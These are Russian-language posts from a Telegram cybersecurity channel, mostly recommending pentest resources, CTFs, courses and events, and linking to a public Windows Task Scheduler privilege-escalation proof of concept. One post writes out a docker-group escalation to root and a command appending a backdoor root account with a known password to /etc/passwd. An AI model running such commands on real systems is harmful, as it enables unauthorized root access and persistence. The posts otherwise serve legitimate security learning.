6.99K subscribers
244 photos
19 videos
29 files
515 links
Yet another hacker

Я Егор Богомолов, с 2015 в кибербезе, основатель проектов Singleton Security и CyberEd.

На канале разбираю новости из мира кибербезопасности через призму личного опыта, делюсь инсайтами, шучу шутки.

По вопросам - @Marta_Irinos
Download Telegram
#hacking #privilageEscalation

Большой материал по повышению привилегий в скомпрометированных системах и пост эксплуатации: Различные ОС, Инструменты, Техники и пр.
https://rmusser.net/docs/Privilege%20Escalation%20&%20Post-Exploitation.html
#hacking #macos

Для пользователей MacOS рекомендую репозиторий пакетного менеджера Homebrew с набором инструментов для пентеста.
https://github.com/sidaf/homebrew-pentest

Easy way:
brew install sidaf/pentest/recon-ng
#professional #hacking #windows #exploit

Появился PoC нашумевшей в последнее время уязвимости в Task Scheduler API Windows, который позволяет повышать привилегии любого пользователя (даже гостевого) до SYSTEM.

Пока что PoC очень сырой и работает только на Windows 10 x64. Но судя по простоте эксплуатации данной уязвимости у специалистов не займет много времени для разработки эксплойта к прочим версиям Windows.

Ключевые статьи на эту тему:
На русском:
https://habr.com/post/421577/

На английском с более подробным разбором:
https://doublepulsar.com/task-scheduler-alpc-exploit-high-level-analysis-ff08cda6ad4f
https://www.bleepingcomputer.com/news/security/exploit-published-for-unpatched-flaw-in-windows-task-scheduler/

Ссылка на репозиторий с PoC:
https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar

Ссылка на репозиторий с его исходными кодами:
https://github.com/GossiTheDog/zeroday/tree/master/ALPC-TaskSched-LPE

На практике PoC демонстрирует возможность создания процесса с привилегиями SYSTEM, и не дает возможность script-kiddy’сам пулять LPE направо и налево.

Детально:
После запуска PoC’a вы получаете процесс заспавненый от процесса spoolsv.exe, называющийся cmd.exe(с правами SYSTEM), который в свою очередь спавнит connhost.exe и notepad.exe (Описывается как рандомный процесс).

Ожидаемо, что в ближайшее время будет разработан эксплоит для удобного спавнинга желаемых процессов с правами SYSTEM в Windows системах.

Также ожидаемо, что исправление данного бага скорее всего займет несколько недель, т.к. от Microsoft требуется исправить ошибки проверки привилегий в функции SchRpcSetSecurity Task Scheduler’a.
#hacking #mobileApp #professional

Отличный репозиторий с Cheat Sheet’ом для анализа защищенности мобильных приложений.
Описано много техник по перехвату трафика, обходу SSL Pinning’a и пр.

https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet/blob/master/README.md
#hacking #knowledge #tg

По просьбам трудящихся, публикую каналы и чаты связанные с хаккингом, ИБ и пр., на которые сам подписан.

P.S. краткие описания приведены для тех, кто только начинает разбираться и ищет источники информации.

Каналы:
https://xn--r1a.website/antichat - легендарный форум Antichat перешел в Tg.
https://xn--r1a.website/hacker_frei - все статьи с журналов Xakep, ITЭксперт и пр. в открытом виде.
https://xn--r1a.website/bykvaadm - канал одного изветного админа. Крутые подсказки, лекции и знания о Linux, Docker, Ansible и пр. технологиях
https://xn--r1a.website/HNews - новостной агрегатор актуальных новостей и событий в ИБ
https://xn--r1a.website/xakep_ru - официальный канал журнала Хакер
https://xn--r1a.website/FullDisclosure - канал с информацией о появляющихся уязвимосятх и эксплойтах
https://xn--r1a.website/bug_bounty_channel - канал с опубликованным багами с HackerOne, обнаруженными в ходе BugBounty
https://xn--r1a.website/anti_malware - новостной агрегатор событий из мира информационной безопасности
https://xn--r1a.website/infosecmemes - самое важное в нашем деле - это мемы
https://xn--r1a.website/cyberpunkyc - один известный хаккер со своим мнением
https://xn--r1a.website/R0_Crew - канал группы R0 Crew, известной своими зубодробительными навыками реверс-инжиниринга
https://xn--r1a.website/webpwn - канал известного хакера из сферы Application Security
https://xn--r1a.website/br0wsec - еще один канал об AppSec и безопасности Client-Side части
https://xn--r1a.website/cybershit - канал с актуальщиной в мире ИБ
https://xn--r1a.website/github_repos - интересные репозитории со всего мира

Чаты:
https://xn--r1a.website/DC7499 - крупнейший чат в Российском комьюнити о ИБ и всем, что с ней связано
https://xn--r1a.website/spbctf - тусовка питерского ВУЗа ИТМО. Ребята активно играют в CTF и готовы всегда ответить на все связанные вопросы.
https://xn--r1a.website/DCG7812 - тусовка DefCon Russia 7812, отличная атмосфера, содержит множество крутейших экспертов своего дела.
https://xn--r1a.website/defcon_nn - чат группы DefCon NN (Нижний Новгород), талантливые ребята пишут свои квесты, разбираются в технологиях и всегда рады гостям

Боты:
@GetSploitBot - Бот аналог известного инструмента для поиска опубликованных уязвимостей - searchsploit
#professional #hacking #LPE

Повышение привилегий до root-пользователя при наличии прав на управление докером в ОС (Доступ к группе ‘docker’)

Если на скомпрометированной машине команда id показывает, что текущий пользователь принадлежит группе docker, значит существует возможность получить доступ к ОС от имени пользователя root командой:

$ docker run -it --rm -v /:/mnt bash

Следующий шаг, добавить бэкдор командой (Учетные данные: toor/password):

# echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd

Ссылка на оригинал:
https://twitter.com/4lex/status/1035932897407115264
#hacking #ctf #beginners

Ребята из spbCTF открывают новый сезон обучения. В этом сезоне речь пойдет о Attack/Defence CTF соревнованиях.
Вводный стрим по ссылке: https://www.youtube.com/watch?v=ELMRyKkHFXU
В описании к видео ссылка на регистрацию и на прочие подробности.
Всем, кому интересно развиваться в направлении CTF соревнований, очень рекомендую.
#research #books

Много кому из новичков, а также уже сформировавшимся профессионалам, будет интересно почитать ежегодное издание PositiveResearch от компании Positive Technologies, которое рассказывает о произошедшем в сфере информационной безопасности за год. Здесь и атаки на коммерческие структуры, разборы новых уязвимостей, статистика и прочее, прочее.

Рекомендую ознакомиться:
https://www.ptsecurity.com/upload/corporate/ru-ru/analytics/Positive-Research-2018-rus.pdf
#hacking #professional #lpe

Полезный набор техник по закреплению, пост-эксплуатации, повышению привилегий в различных системах:
https://movaxbx.ru/2018/09/16/privilege-escalation-post-exploitation/
#informationSecurity #cources #beginers

Инфосистемы JET открывает серию вебинаров по информационной безопасности для начинающих специалистов.
Скорее всего предвидеться много воды, но для ознакомления с терминологией и трендами рекомендую новичкам.
https://habr.com/company/jetinfosystems/blog/423477/

Ссылки на все вебинары:

1. Вебинар «Основные термины ИБ», 4 октября с 16.00 до 18.00.

2. Вебинар «Стандарты ИБ», 9 октября с 16.00 до 18.00.

3. Вебинар «Требования ИБ», 11 октября с 16.00 до 18.00.

4. Вебинар «Технологии ИБ», 16 октября с 16.00 до 18.00.

5. Вебинар «Тренды ИБ», 18 октября с 16.00 до 18.00.
#beginners #video #ctf

Широкоизвестный обладатель канала LiveOverflow (о хакинге, CTF’ах и пр. связанным с ИБ) рассказывает о своем первом опыте игры в Attack/Defense CTF на Defcon Las Vegas 2018.
Интересно посмотреть даже тем, кто уже знаком с данным мероприятием.

https://www.youtube.com/watch?v=RXgp4cDbiq4
#events

15-16 ноября будет конференция OFFZONE в Москве (Digital October). Продажа билетов уже стартовала. Ценник - 5000 рублей. Официальный сайт - offzone.moscow. Репост анонса в другие чаты приветствуется)

Больше подробностей про формат конференции можно почитать в анонсе на хакере - xakep.ru/2018/09/03/offzone-2018/

К тому же у нас до сих пор открыт CFP, так что если есть желание что-нибудь зачитать - велкам) Дедлайн 5 откября. Форму подачи доклада можно найти на сайте.
#hacking #beginners #professional #sqlInjection

Полезная WIKI по SQL-Инъекциям. Разобраны все аспекты эксплуатации инъекций с примерами для MYSQL, Oracle, SQL-Server.

https://sqlwiki.netspi.com/
#hacking #web

Portswigger (Разработчики продукта BurpSuite) объявили номинацию «Top 10 Web Hacking Techniques of 2017».
В качестве кандидатов на странице представлены более 30 крутейших историй взлома компаний через веб-приложения.
Голосование уже завершено, но с историями все еще можно ознакомиться. В ближайшее время ждем результатов номинации.

https://portswigger.net/blog/top-10-web-hacking-techniques-of-2017-voting-open
#ctf #quest

Рекомендую новичками интересный квест от группы Defcon-NN. Когда-то сам успел в него поиграть и взять первое место на PhDays в прохождении этого квеста. Сейчас ребята его доработали и запускают заново. Сложность задач ниже среднего, очень полезно для изучения азов хакинга, т.к. столкнетесь с разными ситуациями и инструментами.
Forwarded from Wire Snark
DefHack 2018.9: Виноградный Джо
или Как сисадмин Виноград оказался не таким уж неуловимым.

Приглашаем принять участие в первом дополнении нашего хакерского квеста DefHack на конференции NeoQUEST-2018! Онлайн-доступ будет открыт с завтрашнего утра, 26 сентября. Подробнее по ссылке http://defcon-nn.ru/defhack.

В квесте представлен виртуальный мир анти-утопии, по которому вам предстоит путешествовать, выполняя различные задания. Всё начинается с поступления на работу в отдел расследования инцидентов Ё-корп. Распутывание дел в роли "белого" хакера приведет вас к встрече с интересными противниками — вы познакомитесь с яркими представителями группировок в "серых" и "чёрных" шляпах. Каждый ваш шаг сказывается на окружающем мире, отражаясь через призму новостного сайта корпорации. По мере того, как вы узнаете стороны конфликта получше, вам, как и в жизни, представится возможность выбора. От того, чью сторону вы примете, зависит судьба этого мира.

Категории заданий, включенные в версию DefHack 2018.9:
- форензика, расследования (сеть, диск)
- веб
- разведка, osint
- mitm
- brute-force
- pwn
- повышение привилегий
- смарт-контракты Этериум

Кроме того, вам представится возможность поработать с сетью Tor, причем не только через браузер, но также потребуется перенаправлять в неё трафик приложений (например, с помощью torsocks). Мы рекомендуем использовать какой-либо дистрибутив Linux.

Участвовать можно как в одиночку, так и в команде. Сложность большинства заданий — легкая или средняя, они вполне по силам любому админу, программисту, тестировщику, и тем более пентестеру. По каждому заданию можно получить внутриигровую подсказку, привязанную к контексту вашего текущего прогресса. Для вопросов к организаторам есть выделенный телеграм-чат @defhack2018_neoquest.

Составляя задания, мы старались приблизить их к реалистичным, потенциально возможным ситуациям. Большинство заданий, надеемся, полезны и для отработки базовых методов атаки, и понимания возможных методов защиты.
#CTF #beginners #hacking

Появилась интересная бета-версия площадки https://attackdefense.com/. Площадка дает задачи по разным направлениям по типу задач CTF. Уровень задач easy-medium (Основываясь на первом взгляде). Рекомендую новичкам, кому хочется изучать не в глубь, а в ширь.
#beginners #professional #reverseEngineering

https://godbolt.org/ очень полезный сайт для изучения языка ассемблера. Интерактивный интерфейс переводит конструкции высокоуровневого языка в ассемблерные конструкции, что очень наглядно демонстрирует то, как происходит компиляция.
Будет полезно начинающим реверс иженерам и прочим специалистам.